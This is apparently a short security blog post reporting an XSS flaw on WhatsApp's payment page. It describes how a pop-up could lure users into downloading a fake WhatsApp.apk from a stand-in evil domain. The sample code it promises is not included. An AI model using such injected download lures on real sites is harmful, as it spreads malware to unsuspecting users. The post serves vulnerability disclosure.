Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users.
Reported vulnerability exist on payment procedure page as shown in above picture. The Sample code given below to demonstrate the vulnerability.
Recently, there has been an increase in web malware and spam activities and such vulnerabilities can be misused by attackers to spread Malwares and rogue applications.
Edgard also demonstrate that How this can be used to trick users to download a fake application (Malware - WhatsApp.apk) from other any evil domain (www.evilwebsite/WhatsApp.apk). in below given example, attacker just using a pop-up window to open fake application download link.
While the official binary is here https://www.whatsapp.com/android/current/WhatsApp.apk
According to reports in 2012 mobile malwares are 50 times increases than previous ever. We request Whatsapp team to fix the vulnerability as soon as possible.